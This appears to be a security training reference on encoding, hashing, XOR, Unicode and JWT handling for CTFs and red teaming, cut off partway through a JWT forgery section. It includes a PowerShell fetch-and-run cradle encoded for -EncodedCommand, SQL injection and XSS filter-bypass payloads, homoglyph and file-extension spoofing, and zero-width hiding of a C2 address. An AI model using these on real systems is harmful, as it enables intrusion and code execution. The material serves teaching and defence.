Encoding, Decoding & Data Manipulation — Ultimate Reference

CIPHER training material. Every section includes working code examples for Python 3.10+ and/or Bash/PowerShell. Designed for CTFs, forensics, exploit development, and red/blue team operations.

Base Encoding
Hex Encoding
URL Encoding
HTML Entities
Unicode
Hashing
XOR
ROT13 / ROT47 / Caesar
JWT
Regular Expressions for Security
Obfuscation & Deobfuscation
Serialization Security
Compression Security
Binary & Struct Manipulation
CyberChef Reference

1. Base Encoding

Base64

Standard alphabet: A-Za-z0-9+/ with = padding. URL-safe variant uses -_ instead of +/.

import base64

# --- Encode / Decode ---
plaintext = b"attack at dawn"
encoded = base64.b64encode(plaintext)          # b'YXR0YWNrIGF0IGRhd24='
decoded = base64.b64decode(encoded)            # b'attack at dawn'

# --- URL-safe Base64 (replaces + with -, / with _) ---
url_encoded = base64.urlsafe_b64encode(plaintext)   # b'YXR0YWNrIGF0IGRhd24='
url_decoded = base64.urlsafe_b64decode(url_encoded)

# --- Decode without padding (common in JWTs, cookies) ---
no_pad = b"YXR0YWNrIGF0IGRhd24"   # missing '='
decoded = base64.b64decode(no_pad + b"=" * (-len(no_pad) % 4))

# --- Detect Base64 ---
import re
def is_base64(s: str) -> bool:
    pattern = r'^[A-Za-z0-9+/]*={0,2}$'
    return bool(re.match(pattern, s)) and len(s) % 4 == 0

# --- File encode/decode ---
with open("/etc/passwd", "rb") as f:
    encoded_file = base64.b64encode(f.read())

# Bash — encode/decode
echo -n "attack at dawn" | base64                    # YXR0YWNrIGF0IGRhd24=
echo "YXR0YWNrIGF0IGRhd24=" | base64 -d             # attack at dawn

# File encode/decode
base64 /etc/passwd > passwd.b64
base64 -d passwd.b64 > passwd_restored

# Decode without trailing newline issues
echo -n "YXR0YWNrIGF0IGRhd24=" | base64 -d

# PowerShell — encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
[Convert]::ToBase64String($bytes)                    # YXR0YWNrIGF0IGRhd24=

$decoded = [Convert]::FromBase64String("YXR0YWNrIGF0IGRhd24=")
[System.Text.Encoding]::UTF8.GetString($decoded)     # attack at dawn

# File encode
$raw = [IO.File]::ReadAllBytes("C:\Windows\System32\calc.exe")
[Convert]::ToBase64String($raw) | Out-File calc.b64

Security notes:

Base64 is NOT encryption. Attackers use it to bypass naive content filters.
Double-base64 encoding is common in obfuscated payloads.
Look for Base64 in HTTP headers (Authorization: Basic), cookies, POST bodies.
PowerShell -EncodedCommand accepts UTF-16LE Base64: powershell -enc <base64>.

Base32

Alphabet: A-Z2-7 with = padding. Case-insensitive. Used in TOTP/HOTP secrets, onion addresses.

import base64

encoded = base64.b32encode(b"attack at dawn")   # b'MFYHA3DFNZSCA5DFON2CATQ='
decoded = base64.b32decode(encoded)              # b'attack at dawn'

# Case insensitive decode
decoded = base64.b32decode(b"mfyha3dfnzsca5dfon2catq=", casefold=True)

# Bash (requires coreutils or python)
echo -n "attack at dawn" | base32                    # MFYHA3DFNZSCA5DFON2CATQ=
echo "MFYHA3DFNZSCA5DFON2CATQ=" | base32 -d         # attack at dawn

Base58

No 0OIl characters (avoids visual ambiguity). Used in Bitcoin addresses, IPFS CIDs.

# pip install base58
import base58

encoded = base58.b58encode(b"attack at dawn")   # b'4HDeGkTpAkVKFsmvu'
decoded = base58.b58decode(encoded)              # b'attack at dawn'

# Base58Check (Bitcoin) — includes version byte + 4-byte checksum
encoded_check = base58.b58encode_check(b"\x00" + b"attack at dawn")

Base85 (Ascii85)

Higher density than Base64 — 4 bytes become 5 ASCII chars. Used in PDF, Git binary patches, ZeroMQ.

import base64

# Ascii85 (Adobe variant)
encoded = base64.a85encode(b"attack at dawn")    # b'@UX=hF)rM5Bl7Q+Df'
decoded = base64.a85decode(encoded)

# Base85 (RFC 1924 / Git variant)
encoded = base64.b85encode(b"attack at dawn")    # b'VPa!sWo2ML@;IANXJ~X'
decoded = base64.b85decode(encoded)

# Bash — using Python one-liner
echo -n "attack at dawn" | python3 -c "import sys,base64; print(base64.b85encode(sys.stdin.buffer.read()).decode())"

Base encoding detection heuristics

Encoding	Alphabet	Padding	Length multiple
Base64	`A-Za-z0-9+/`	`=` (0-2)	4
Base64url	`A-Za-z0-9-_`	`=` or none	4
Base32	`A-Z2-7`	`=` (0-6)	8
Base58	`123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz`	None	Variable
Base85	`!-u` (ASCII 33-117)	None	5 per 4 bytes

2. Hex Encoding

Hex to/from ASCII

# --- ASCII to Hex ---
text = "attack at dawn"
hex_str = text.encode().hex()                        # '61747461636b206174206461776e'
hex_spaced = ' '.join(f'{b:02x}' for b in text.encode())  # '61 74 74 61 63 6b ...'

# --- Hex to ASCII ---
recovered = bytes.fromhex('61747461636b206174206461776e').decode()  # 'attack at dawn'

# --- Hex to ASCII ignoring whitespace ---
dirty_hex = "61 74 74 61\n63 6b"
clean = bytes.fromhex(dirty_hex.replace(' ', '').replace('\n', ''))

# --- Hexdump (xxd-style) ---
import binascii
data = b"\x7fELF\x02\x01\x01\x00"
for i in range(0, len(data), 16):
    chunk = data[i:i+16]
    hex_part = ' '.join(f'{b:02x}' for b in chunk)
    ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
    print(f'{i:08x}  {hex_part:<48}  |{ascii_part}|')

# ASCII to hex
echo -n "attack at dawn" | xxd -p                     # 61747461636b206174206461776e
echo -n "attack at dawn" | od -A x -t x1z -v

# Hex to ASCII
echo "61747461636b206174206461776e" | xxd -r -p        # attack at dawn

# Hexdump a binary
xxd /bin/ls | head -20
hexdump -C /bin/ls | head -20

# PowerShell — hex encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
($bytes | ForEach-Object { '{0:x2}' -f $_ }) -join ''

# Hex to bytes
$hex = "61747461636b206174206461776e"
$bytes = for ($i = 0; $i -lt $hex.Length; $i += 2) {
    [Convert]::ToByte($hex.Substring($i, 2), 16)
}
[System.Text.Encoding]::UTF8.GetString($bytes)

Hex to/from Binary and Decimal

# Hex <-> Decimal
hex_val = "deadbeef"
decimal = int(hex_val, 16)              # 3735928559
back_to_hex = hex(decimal)              # '0xdeadbeef'

# Hex <-> Binary
binary = bin(int("ff", 16))             # '0b11111111'
hex_from_bin = hex(int("11111111", 2))  # '0xff'

# IP address: dotted decimal <-> hex
import ipaddress
ip = ipaddress.IPv4Address("192.168.1.1")
hex_ip = format(int(ip), '08x')         # 'c0a80101'
ip_back = ipaddress.IPv4Address(int(hex_ip, 16))  # 192.168.1.1

# Useful for shellcode: \x escape format
shellcode_hex = "6a0258994889d74831f60f05"
shellcode_escaped = ''.join(f'\\x{shellcode_hex[i:i+2]}' for i in range(0, len(shellcode_hex), 2))
# '\\x6a\\x02\\x58\\x99\\x48\\x89\\xd7\\x48\\x31\\xf6\\x0f\\x05'

shellcode_bytes = bytes.fromhex(shellcode_hex)

# Decimal to hex
printf '%x\n' 3735928559                # deadbeef

# Hex to decimal
echo $((16#deadbeef))                   # 3735928559
printf '%d\n' 0xdeadbeef               # 3735928559

# Binary to hex
echo "obase=16;ibase=2;11011110101011011011111011101111" | bc  # DEADBEEF

3. URL Encoding

Single encoding

from urllib.parse import quote, unquote, quote_plus, unquote_plus

# Standard percent-encoding (space -> %20)
encoded = quote("admin' OR 1=1--")           # "admin%27%20OR%201%3D1--"
decoded = unquote("admin%27%20OR%201%3D1--")  # "admin' OR 1=1--"

# Plus-encoding (space -> +, used in form data)
encoded = quote_plus("search term here")     # "search+term+here"
decoded = unquote_plus("search+term+here")   # "search term here"

# Encode everything (even safe characters)
fully_encoded = quote("test", safe='')        # 'test' — all alpha safe by default
fully_encoded = quote("/path/file", safe='')  # '%2Fpath%2Ffile'

Double encoding (WAF bypass)

from urllib.parse import quote

payload = "' OR 1=1--"
single = quote(payload, safe='')        # %27%20OR%201%3D1--
double = quote(single, safe='')         # %2527%2520OR%25201%253D1--

# Server that decodes twice will see the original payload
# First decode:  %27%20OR%201%3D1--
# Second decode: ' OR 1=1--

# Triple encoding (rare, but seen in nested proxies)
triple = quote(quote(quote(payload, safe=''), safe=''), safe='')

Unicode URL encoding

from urllib.parse import quote

# UTF-8 URL encoding of Unicode characters
encoded = quote("file:///../etc/passwd")            # standard
encoded = quote("\u2025")                            # %E2%80%A5 (two-dot leader)
# Some parsers normalize \u2025 to ".." -> path traversal

# IRI to URI conversion
iri = "https://example.com/path/\u00e9"              # e-acute
uri = quote(iri, safe=':/@')                         # https://example.com/path/%C3%A9

# Overlong UTF-8 encoding (historic bypass, CVE-2000-0884 IIS)
# Normal '/' = 0x2F = %2F
# Overlong 2-byte: 0xC0 0xAF = %C0%AF
# Overlong 3-byte: 0xE0 0x80 0xAF = %E0%80%AF
# Modern parsers reject these, but legacy systems may not

# Bash — URL encode
python3 -c "from urllib.parse import quote; print(quote(\"admin' OR 1=1--\", safe=''))"

# URL encode with curl
curl -G --data-urlencode "q=admin' OR 1=1--" http://example.com/search

# URL decode
python3 -c "from urllib.parse import unquote; print(unquote('%27%20OR%201%3D1--'))"

# PowerShell
[System.Uri]::EscapeDataString("admin' OR 1=1--")
[System.Uri]::UnescapeDataString("%27%20OR%201%3D1--")

# .NET HttpUtility (requires System.Web)
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlEncode("admin' OR 1=1--")
[System.Web.HttpUtility]::UrlDecode("%27+OR+1%3D1--")

Security notes:

Double encoding bypasses WAFs that decode only once before rule matching.
%00 (null byte) truncates strings in C-based parsers — file.php%00.jpg may bypass extension checks.
%0d%0a = CRLF injection in HTTP headers.
Path normalization differences between proxy and backend enable smuggling.

4. HTML Entities

Named entities

import html

# Encode — only encodes &, <, >, " by default
encoded = html.escape('<script>alert("XSS")</script>')
# '&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;'

# Encode with single quotes
encoded = html.escape("it's <dangerous>", quote=True)
# 'it&#x27;s &lt;dangerous&gt;'

# Decode
decoded = html.unescape('&lt;script&gt;alert(1)&lt;/script&gt;')
# '<script>alert(1)</script>'
decoded = html.unescape('&amp;lt;')  # '&lt;'  — only one layer decoded

Numeric (decimal) entities

# Character to decimal entity
char = '<'
entity = f'&#{ord(char)};'             # '&#60;'

# String to all-decimal-entities (XSS obfuscation)
payload = '<script>alert(1)</script>'
obfuscated = ''.join(f'&#{ord(c)};' for c in payload)
# '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;...'

# Decode
import html
decoded = html.unescape('&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;')
# '<script>'

Hex entities

# Character to hex entity
char = '<'
entity = f'&#x{ord(char):x};'          # '&#x3c;'

# String to all-hex-entities
payload = '<img src=x onerror=alert(1)>'
obfuscated = ''.join(f'&#x{ord(c):x};' for c in payload)
# '&#x3c;&#x69;&#x6d;&#x67;...'

# Mixed encoding (harder for filters)
# &#60;script&#x3e;alert&#40;1&#41;&#60;/script&#x3e;

# Decode all forms
import html
html.unescape('&#x3c;&#60;&lt;')       # '<<<'

# Bash — decode HTML entities
python3 -c "import html; print(html.unescape('&lt;script&gt;'))"

# Encode
python3 -c "import html; print(html.escape('<script>alert(1)</script>'))"

Security notes:

Browsers decode HTML entities in attribute values: <a href="javascript:alert(1)"> works with entities.
Entity encoding without semicolons works in some browsers: &#60script parsed as <script.
Null bytes in entities:  may bypass filters.
Double encoding: &lt; decodes to < on first pass, < on second.

Quick reference table

Character	Named	Decimal	Hex
`<`	`<`	`<`	`<`
`>`	`>`	`>`	`>`
`&`	`&`	`&`	`&`
`"`	`"`	`"`	`"`
`'`	`'`	`'`	`'`
`/`	—	`/`	`/`

5. Unicode

UTF-8 encoding internals

# UTF-8 byte representation
text = "cafe\u0301"     # cafe + combining accent = "cafe\u0301" (visually: "cafe?")
utf8_bytes = text.encode('utf-8')
print(utf8_bytes.hex())  # 636166 65cc81

# Character byte length in UTF-8
for char in ['A', '\u00e9', '\u4e16', '\U0001f600']:
    encoded = char.encode('utf-8')
    print(f"U+{ord(char):04X}  {char!r:>10}  {len(encoded)} bytes  {encoded.hex()}")
# U+0041       'A'  1 bytes  41
# U+00E9       'e'  2 bytes  c3a9
# U+4E16      '\u4e16'  3 bytes  e4b896
# U+1F600   '\U0001f600'  4 bytes  f09f9880

# UTF-8 byte ranges
# 0xxxxxxx             -> 1 byte  (U+0000 to U+007F)
# 110xxxxx 10xxxxxx     -> 2 bytes (U+0080 to U+07FF)
# 1110xxxx 10xxxxxx 10xxxxxx  -> 3 bytes (U+0800 to U+FFFF)
# 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx -> 4 bytes (U+10000 to U+10FFFF)

UTF-16 encoding

# UTF-16LE is the standard for Windows internals and PowerShell -EncodedCommand
text = "calc.exe"
utf16le = text.encode('utf-16-le')
print(utf16le.hex())    # 630061006c0063002e00650078006500

# Decode
decoded = utf16le.decode('utf-16-le')  # 'calc.exe'

# PowerShell encoded command preparation
import base64
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
encoded_cmd = base64.b64encode(cmd.encode('utf-16-le')).decode()
# Use as: powershell -enc <encoded_cmd>

# UTF-16 BOM detection
data = b'\xff\xfe\x41\x00'   # UTF-16-LE BOM + 'A'
data = b'\xfe\xff\x00\x41'   # UTF-16-BE BOM + 'A'

Punycode (IDN homograph attacks)

# Punycode encodes Unicode domain names for DNS
domain = "example.com"
evil_domain = "\u0435xample.com"   # Cyrillic 'e' (U+0435) instead of Latin 'e'

# Encode to punycode (ACE form)
punycode = evil_domain.encode('idna')   # b'xn--xample-9uf.com'

# Decode punycode
decoded = b'xn--xample-9uf.com'.decode('idna')  # looks like 'example.com'

# Detect homographs
def has_mixed_scripts(domain: str) -> bool:
    import unicodedata
    scripts = set()
    for char in domain:
        if char in '.-':
            continue
        cat = unicodedata.category(char)
        if cat.startswith('L'):
            # Rough script detection via name
            name = unicodedata.name(char, '')
            if 'CYRILLIC' in name:
                scripts.add('cyrillic')
            elif 'LATIN' in name:
                scripts.add('latin')
            elif 'GREEK' in name:
                scripts.add('greek')
    return len(scripts) > 1

print(has_mixed_scripts("\u0435xample.com"))  # True — mixed Cyrillic + Latin

# Bash — punycode conversion
python3 -c "print('\u0435xample.com'.encode('idna'))"

# Using idn command (libidn)
echo "xn--xample-9uf.com" | idn --idna-to-unicode 2>/dev/null

Homoglyph attacks

# Characters that look identical but have different codepoints
homoglyphs = {
    'a': ['\u0430'],              # Cyrillic а
    'e': ['\u0435'],              # Cyrillic е
    'o': ['\u043e', '\u006f'],    # Cyrillic о, Latin o
    'p': ['\u0440'],              # Cyrillic р
    'c': ['\u0441'],              # Cyrillic с
    'x': ['\u0445'],              # Cyrillic х
    'H': ['\u041d'],              # Cyrillic Н
    'T': ['\u0422'],              # Cyrillic Т
    'B': ['\u0412'],              # Cyrillic В
    'A': ['\u0391'],              # Greek Α
    'l': ['\u04cf', '\u0049'],    # Cyrillic palochka, Latin I
    '0': ['\u041e'],              # Cyrillic О
    '/': ['\u2044', '\u2215'],    # Fraction slash, Division slash
}

# Generate confusable version of a URL
def generate_confusable(url: str) -> str:
    import random
    result = []
    for char in url:
        if char in homoglyphs and random.random() > 0.5:
            result.append(random.choice(homoglyphs[char]))
        else:
            result.append(char)
    return ''.join(result)

# Detection: normalize and compare
import unicodedata
def confusable_check(s1: str, s2: str) -> bool:
    n1 = unicodedata.normalize('NFKC', s1).lower()
    n2 = unicodedata.normalize('NFKC', s2).lower()
    return n1 == n2 and s1 != s2

Zero-width characters (steganography / watermarking)

# Zero-width characters are invisible but present in text
ZWSP = '\u200b'    # Zero-Width Space
ZWNJ = '\u200c'    # Zero-Width Non-Joiner
ZWJ  = '\u200d'    # Zero-Width Joiner
ZWNS = '\ufeff'    # Zero-Width No-Break Space (BOM)

# Encode binary data in zero-width characters
def zw_encode(secret: str) -> str:
    """Encode secret as zero-width characters between visible text."""
    bits = ''.join(f'{b:08b}' for b in secret.encode())
    zw_str = ''
    for bit in bits:
        zw_str += ZWJ if bit == '1' else ZWSP
    return zw_str

def zw_decode(text: str) -> str:
    """Extract zero-width encoded secret from text."""
    bits = ''
    for char in text:
        if char == ZWJ:
            bits += '1'
        elif char == ZWSP:
            bits += '0'
    byte_list = [int(bits[i:i+8], 2) for i in range(0, len(bits) - len(bits) % 8, 8)]
    return bytes(byte_list).decode('utf-8', errors='ignore')

# Embed in innocent text
visible = "Nothing to see here"
hidden = zw_encode("C2:10.0.0.1")
watermarked = visible[:7] + hidden + visible[7:]
# Looks like "Nothing to see here" but contains hidden data

# Detect zero-width characters
def detect_zw(text: str) -> list[tuple[int, str, str]]:
    zw_chars = {'\u200b': 'ZWSP', '\u200c': 'ZWNJ', '\u200d': 'ZWJ',
                '\ufeff': 'BOM', '\u200e': 'LRM', '\u200f': 'RLM',
                '\u2060': 'WJ', '\u2061': 'FA', '\u2062': 'IT', '\u2063': 'IS'}
    found = []
    for i, char in enumerate(text):
        if char in zw_chars:
            found.append((i, f'U+{ord(char):04X}', zw_chars[char]))
    return found

# Strip zero-width characters
import re
def strip_zw(text: str) -> str:
    return re.sub(r'[\u200b-\u200f\u2060-\u2064\ufeff]', '', text)

Unicode normalization attacks

import unicodedata

# NFC, NFD, NFKC, NFKD normalization forms
# Exploitable when filter checks one form but app uses another

s = "file\u0000.txt"          # null byte injection
s = "\uff0e\uff0e/etc/passwd" # fullwidth dots '..' -> path traversal after NFKC

# NFKC normalizes fullwidth to ASCII
print(unicodedata.normalize('NFKC', '\uff0e\uff0e'))  # '..'
print(unicodedata.normalize('NFKC', '\uff1c'))         # '<'
print(unicodedata.normalize('NFKC', '\uff1e'))         # '>'

# Bypass WAF example:
# WAF blocks: <script>
# Send: \uff1cscript\uff1e   (fullwidth < and >)
# Backend normalizes NFKC: <script>  -> XSS

# Right-to-Left Override attack (file extension spoofing)
filename = "invoice\u202egnp.exe"
# Displays as: invoiceexe.png  (appears to be PNG)
# Actual file: invoice[RLO]gnp.exe  (is actually .exe)

6. Hashing

MD5 (128-bit, BROKEN for collision resistance)

import hashlib

# String hash
md5 = hashlib.md5(b"password").hexdigest()
# '5f4dcc3b5aa765d61d8327deb882cf99'

# File hash
def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            h.update(chunk)
    return h.hexdigest()

echo -n "password" | md5sum                       # 5f4dcc3b5aa765d61d8327deb882cf99
md5sum /etc/passwd                                 # file hash

$md5 = [System.Security.Cryptography.MD5]::Create()
$bytes = [System.Text.Encoding]::UTF8.GetBytes("password")
[BitConverter]::ToString($md5.ComputeHash($bytes)).Replace("-","").ToLower()

Get-FileHash -Algorithm MD5 C:\Windows\System32\calc.exe

SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)

sha1 = hashlib.sha1(b"password").hexdigest()
# '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'

echo -n "password" | sha1sum
sha1sum /bin/ls

SHA-256 (256-bit, current standard)

sha256 = hashlib.sha256(b"password").hexdigest()
# '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'

# HMAC-SHA256
import hmac
sig = hmac.new(b"secret_key", b"message", hashlib.sha256).hexdigest()

echo -n "password" | sha256sum
sha256sum /bin/ls
openssl dgst -sha256 /bin/ls

# HMAC
echo -n "message" | openssl dgst -sha256 -hmac "secret_key"

SHA-512 (512-bit)

sha512 = hashlib.sha512(b"password").hexdigest()
# 'b109f3bbbc244eb82441917ed06d618b9008dd09...'

echo -n "password" | sha512sum

NTLM (Windows password hash)

import hashlib

def ntlm_hash(password: str) -> str:
    """Compute NTLM hash (MD4 of UTF-16LE password)."""
    return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()

print(ntlm_hash("Password1"))
# 'a4f49c406510bdcab6824ee7c30fd852'

# LM hash (legacy, DES-based, extremely weak)
# Splits password into two 7-char halves, uppercases, DES encrypts "KGS!@#$%"
# Not shown — do not use LM in any modern system

# NTLM hash with Python one-liner
python3 -c "import hashlib; print(hashlib.new('md4', 'Password1'.encode('utf-16-le')).hexdigest())"

# Using openssl (if md4 available)
echo -n "Password1" | iconv -t utf-16le | openssl dgst -md4 2>/dev/null

Net-NTLMv2 (challenge-response, captured on the wire)

import hashlib
import hmac
import os

def compute_ntlmv2_response(password: str, user: str, domain: str,
                             server_challenge: bytes, client_challenge: bytes = None) -> str:
    """Compute Net-NTLMv2 response (simplified)."""
    if client_challenge is None:
        client_challenge = os.urandom(8)

    # Step 1: NTLM hash
    nt_hash = hashlib.new('md4', password.encode('utf-16-le')).digest()

    # Step 2: NTLMv2 hash = HMAC-MD5(NT_hash, uppercase(user) + domain)
    identity = (user.upper() + domain).encode('utf-16-le')
    ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()

    # Step 3: NTLMv2 response = HMAC-MD5(NTLMv2_hash, server_challenge + blob)
    # blob is complex in practice; simplified here
    blob = server_challenge + client_challenge
    ntlmv2_response = hmac.new(ntlmv2_hash, blob, hashlib.md5).hexdigest()

    return ntlmv2_response

# Hashcat format for cracking Net-NTLMv2:
# user::domain:server_challenge:ntlmv2_response:blob
# hashcat -m 5600 hash.txt wordlist.txt

Multi-hash utility

import hashlib

def multi_hash(data: bytes) -> dict[str, str]:
    """Compute multiple hashes simultaneously."""
    algorithms = ['md5', 'sha1', 'sha256', 'sha512']
    return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}

result = multi_hash(b"password")
for algo, digest in result.items():
    print(f"{algo:>8}: {digest}")

# Hash identification by length
HASH_LENGTHS = {
    32: ['MD5', 'NTLM', 'MD4'],
    40: ['SHA-1'],
    56: ['SHA-224'],
    64: ['SHA-256'],
    96: ['SHA-384'],
    128: ['SHA-512'],
}

def identify_hash(h: str) -> list[str]:
    """Identify possible hash type by length."""
    h = h.strip()
    length = len(h)
    candidates = HASH_LENGTHS.get(length, ['Unknown'])
    # Additional heuristics
    if length == 32 and ':' not in h:
        # Could be MD5 or NTLM — check context
        pass
    return candidates

# Compute all hashes at once
echo -n "password" | tee >(md5sum) >(sha1sum) >(sha256sum) >(sha512sum) > /dev/null

# Hash identification with hashid (pip install hashid)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'

# Hash identification with hash-identifier or haiti
haiti '5f4dcc3b5aa765d61d8327deb882cf99'

7. XOR

Single-byte XOR

def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)

# Encrypt
plaintext = b"attack at dawn"
key = 0x42
ciphertext = xor_single_byte(plaintext, key)
print(ciphertext.hex())   # '233626233a2962223626622327'...'

# Decrypt (same operation)
recovered = xor_single_byte(ciphertext, key)
assert recovered == plaintext

Multi-byte XOR

from itertools import cycle

def xor_multi_byte(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating multi-byte key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b"The quick brown fox jumps over the lazy dog"
key = b"SECRET"
ciphertext = xor_multi_byte(plaintext, key)
recovered = xor_multi_byte(ciphertext, key)
assert recovered == plaintext

Single-byte XOR brute force

def xor_bruteforce(ciphertext: bytes) -> list[tuple[int, bytes, float]]:
    """Brute force all 256 single-byte XOR keys. Score by printable ratio."""
    results = []
    for key in range(256):
        candidate = xor_single_byte(ciphertext, key)
        printable = sum(1 for b in candidate if 32 <= b < 127)
        score = printable / len(candidate)
        results.append((key, candidate, score))
    results.sort(key=lambda x: x[2], reverse=True)
    return results

# Example: find key for XOR-encoded shellcode
encoded = bytes([0x33, 0x26, 0x26, 0x33, 0x39, 0x29, 0x62, 0x33, 0x26, 0x62, 0x24, 0x33, 0x21, 0x2c])
for key, plaintext, score in xor_bruteforce(encoded)[:3]:
    print(f"Key 0x{key:02x} ({score:.0%}): {plaintext}")

Known-plaintext XOR attack

def xor_known_plaintext(ciphertext: bytes, known_plain: bytes, offset: int = 0) -> bytes:
    """Recover XOR key using known plaintext at a known offset."""
    key_fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known_plain))
    return key_fragment

# Example: PE files always start with 'MZ' (0x4d5a)
# If XOR-encoded PE is found, recover first 2 key bytes:
encoded_pe = b'\x1f\x28\x90\x00...'  # hypothetical
known = b'MZ'
key_start = xor_known_plaintext(encoded_pe, known)
print(f"Key starts with: {key_start.hex()}")

# Known plaintext for common file types:
# PE/DLL:   b'MZ' (4d5a)
# ELF:      b'\x7fELF' (7f454c46)
# PDF:      b'%PDF' (25504446)
# ZIP/DOCX: b'PK\x03\x04' (504b0304)
# GZIP:     b'\x1f\x8b' (1f8b)
# PNG:      b'\x89PNG\r\n\x1a\n' (89504e470d0a1a0a)
# JPEG:     b'\xff\xd8\xff' (ffd8ff)

# Recover repeating key length using Hamming distance (Kasiski method)
def hamming_distance(b1: bytes, b2: bytes) -> int:
    return sum(bin(a ^ b).count('1') for a, b in zip(b1, b2))

def guess_key_length(ciphertext: bytes, max_len: int = 40) -> list[tuple[int, float]]:
    """Estimate repeating XOR key length via normalized Hamming distance."""
    scores = []
    for kl in range(2, max_len + 1):
        blocks = [ciphertext[i*kl:(i+1)*kl] for i in range(4)]
        if len(blocks[3]) < kl:
            continue
        distances = []
        for i in range(len(blocks)):
            for j in range(i+1, len(blocks)):
                distances.append(hamming_distance(blocks[i], blocks[j]) / kl)
        avg = sum(distances) / len(distances)
        scores.append((kl, avg))
    scores.sort(key=lambda x: x[1])
    return scores[:5]

# XOR with Python one-liner
python3 -c "
data = bytes.fromhex('233626233a2962223626622327')
key = 0x42
print(bytes(b ^ key for b in data))
"

# XOR file with a key using xortool
# pip install xortool
xortool -b -l 4 encrypted.bin           # guess key length
xortool -b -l 4 -c 00 encrypted.bin     # try assuming null byte is most frequent

8. ROT13 / ROT47 / Caesar

ROT13 (letters only, A-Z / a-z shifted by 13)

import codecs

# Encode/Decode (symmetric — same operation)
encoded = codecs.encode("Attack at dawn", "rot_13")    # "Nggnpx ng qnja"
decoded = codecs.encode(encoded, "rot_13")             # "Attack at dawn"

# Manual implementation
def rot13(text: str) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + 13) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + 13) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

echo "Attack at dawn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Nggnpx ng qnja
echo "Nggnpx ng qnja" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Attack at dawn

# Alternative
echo "Attack at dawn" | rot13   # if rot13 command available

ROT47 (printable ASCII 33-126, shifted by 47)

def rot47(text: str) -> str:
    """ROT47: rotate printable ASCII characters (! through ~)."""
    result = []
    for c in text:
        o = ord(c)
        if 33 <= o <= 126:
            result.append(chr(33 + (o - 33 + 47) % 94))
        else:
            result.append(c)
    return ''.join(result)

encoded = rot47("Attack at dawn!")     # "p==246 2= 52H?P"
decoded = rot47(encoded)               # "Attack at dawn!"

echo "Attack at dawn!" | tr '!-~' 'P-~!-O'

General Caesar cipher (arbitrary shift)

def caesar(text: str, shift: int) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + shift) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + shift) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

# Brute force all 26 shifts
def caesar_bruteforce(ciphertext: str) -> list[tuple[int, str]]:
    return [(shift, caesar(ciphertext, shift)) for shift in range(26)]

# Example: CTF challenge
for shift, candidate in caesar_bruteforce("Gur synt vf PGS{ebg13_vf_rnfl}"):
    if 'CTF' in candidate or 'flag' in candidate.lower():
        print(f"Shift {shift}: {candidate}")
# Shift 13: The flag is CTF{rot13_is_easy}

9. JWT (JSON Web Tokens)

Decode JWT (no verification)

import base64
import json

def jwt_decode(token: str) -> dict:
    """Decode JWT without verification — forensic/analysis use."""
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")

    def decode_part(part: str) -> dict:
        # Add padding
        padded = part + '=' * (-len(part) % 4)
        decoded = base64.urlsafe_b64decode(padded)
        return json.loads(decoded)

    header = decode_part(parts[0])
    payload = decode_part(parts[1])
    signature = parts[2]

    return {
        'header': header,
        'payload': payload,
        'signature': signature,
        'raw_parts': parts
    }

# Example
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
result = jwt_decode(token)
print(json.dumps(result['header'], indent=2))
# {"alg": "HS256", "typ": "JWT"}
print(json.dumps(result['payload'], indent=2))
# {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}

# Bash — decode JWT
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2>/dev/null
# {"alg":"HS256"}

# Full decode
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
echo "$TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

Forge JWT with alg:none attack (CVE-2015-9235)

import base64
import json

def jwt_forge_none(payload: dict) -> str:
    """Forge JWT with alg:none — exploits servers that don't verify algorithm."""
    header = {"alg": "none", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

